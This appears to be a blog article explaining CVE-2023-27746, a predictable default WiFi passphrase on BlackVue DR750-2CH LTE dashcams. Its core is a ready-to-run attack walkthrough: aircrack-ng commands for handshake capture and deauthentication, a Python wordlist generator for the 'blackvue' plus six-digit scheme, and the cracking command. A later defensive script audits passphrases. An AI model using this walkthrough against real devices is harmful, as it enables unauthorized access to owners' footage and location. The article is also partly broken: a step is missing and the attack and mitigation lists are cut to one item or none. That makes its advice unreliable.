In early 2023, cybersecurity researchers discovered a serious vulnerability in the BlackVue DR750-2CH LTE dashcam (firmware v1.012_2022.10.26). This flaw, tracked as CVE-2023-27746, centers around a weak default WiFi passphrase that can be easily cracked with minimal effort. When exploited, it allows an attacker to access dashcam networks and possibly sensitive video data. In this article, we’ll break down how the vulnerability works, walk through a proof-of-concept exploit, and provide links for further reading—all using simple language.
The Vulnerability: Weak Default Passphrase
What’s vulnerable?
The BlackVue DR750-2CH LTE dashcam lets users connect their phones using WiFi for streaming, configuring settings, or downloading recorded footage. By default, it sets up its own WPA2-protected WiFi network using a default passphrase. However, that passphrase is generated in a predictable and weak way.
Why does it matter?
If an attacker can intercept the device’s WPA2 handshake (when someone connects to the dashcam WiFi), they can attempt a brute-force attack using the default passphrase algorithm. Since the passphrase is weak, the handshake can be cracked in just a few minutes using a regular computer.
Step 1: Capture the WPA2 Handshake
The first step is to capture the WiFi handshake. This can be done using tools like airmon-ng and airodump-ng from the Aircrack-ng suite.
```bash
# Set wireless card to monitor mode
sudo airmon-ng start wlan0
# Capture handshakes on the dashcam's WiFi channel (e.g., channel 6)
sudo airodump-ng -c 6 --bssid [DASHCAM_BSSID] -w capture wlan0mon
# Wait for a connection attempt, or force a re-authentication:
sudo aireplay-ng -0 1 -a [DASHCAM_BSSID] wlan0mon
```
*Replace [DASHCAM_BSSID] with the MAC address of the dashcam's WiFi.*
Researchers found that BlackVue often uses a simple default passphrase scheme like:
blackvue[Last 6 digits of dashcam serial number]
Example: blackvue123456
You can make a small wordlist script if you know possible serial number patterns.
```python
# passgen.py
for i in range(0, 1000000):  # 6-digit range: 000000 through 999999
    print(f"blackvue{i:06d}")
```
Then, use Aircrack-ng for brute-forcing:
```bash
python3 passgen.py > passlist.txt
aircrack-ng -w passlist.txt -b [DASHCAM_BSSID] capture-01.cap
```
After a few minutes, aircrack-ng should reveal the correct WiFi password.
Step 3: Access the Dashcam
With this password, you can connect to the dashcam’s WiFi network. Depending on the dashcam’s security settings, you might:
- Track the device’s location
Note: Unauthorized access is illegal. This information is provided for educational and mitigation purposes only.
Protecting Yourself
While BlackVue may issue a firmware update to fix this issue (check for updates here), you can:
References & Further Reading
- CVE-2023-27746 at NVD
- Original Exploit Report / GitHub *(if public)*
- Aircrack-ng Official Site
- BlackVue Firmware Updates
Conclusion
The BlackVue DR750-2CH LTE is a popular dashcam, but this vulnerability (CVE-2023-27746) shows just how important it is to change default passwords. Weak default credentials are one of the most common ways hackers gain access to devices. If you use any BlackVue dashcam, check your firmware, update if needed, and always set a strong, custom WiFi password.
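The check below is an added example, not code from the original article or from BlackVue. It flags passphrases that follow the default scheme described above, compares that keyspace with a random replacement, and generates one. The serial format, the inventory entries and the 5000 guesses-per-second rate are constructed assumptions.

```python
import math
import re
import secrets
import string

# Scheme described in the article: "blackvue" followed by six digits.
DEFAULT_SCHEME = re.compile(r"blackvue\d{6}", re.IGNORECASE)
DEFAULT_KEYSPACE = 10 ** 6                        # 000000 through 999999
ALPHABET = string.ascii_letters + string.digits   # 62 symbols


def entropy_bits(keyspace: int) -> float:
    """Entropy of a secret chosen uniformly from `keyspace` values."""
    return math.log2(keyspace)


def exhaust_seconds(keyspace: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at an assumed guess rate."""
    return keyspace / guesses_per_second


def audit(passphrase: str, serial: str = "") -> str:
    """Return "invalid", "default-scheme", "serial-derived" or "custom"."""
    if not 8 <= len(passphrase) <= 63:      # WPA2 passphrase length limits
        return "invalid"
    if DEFAULT_SCHEME.fullmatch(passphrase):
        return "default-scheme"
    if len(serial) >= 6 and serial[-6:] in passphrase:
        return "serial-derived"
    return "custom"   # neither weak pattern matched; strength is not scored


def new_passphrase(length: int = 20) -> str:
    """Random replacement passphrase drawn from the OS CSPRNG."""
    if not 8 <= length <= 63:
        raise ValueError("WPA2 passphrases are 8-63 characters")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


if __name__ == "__main__":
    # Constructed inventory: (unit label, serial, configured passphrase).
    fleet = [("van-01", "BV00123456", "blackvue123456"),
             ("van-02", "BV00654321", "Depot-654321")]
    for label, serial, pw in fleet:
        print(label, audit(pw, serial))
    # 5000 guesses/s is an assumed rate, not a measured figure.
    print(f"default scheme: {entropy_bits(DEFAULT_KEYSPACE):.1f} bits, "
          f"{exhaust_seconds(DEFAULT_KEYSPACE, 5000.0) / 60:.1f} min to exhaust")
    print(f"random 20 chars: {entropy_bits(len(ALPHABET) ** 20):.1f} bits")
```

At the assumed rate the default keyspace is exhausted in about 3.3 minutes, which is consistent with the "few minutes" figure above, while a random 20-character passphrase carries roughly 119 bits.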
Timeline
Published on: 04/13/2023 20:15:00 UTC
Last modified on: 04/21/2023 19:06:00 UTC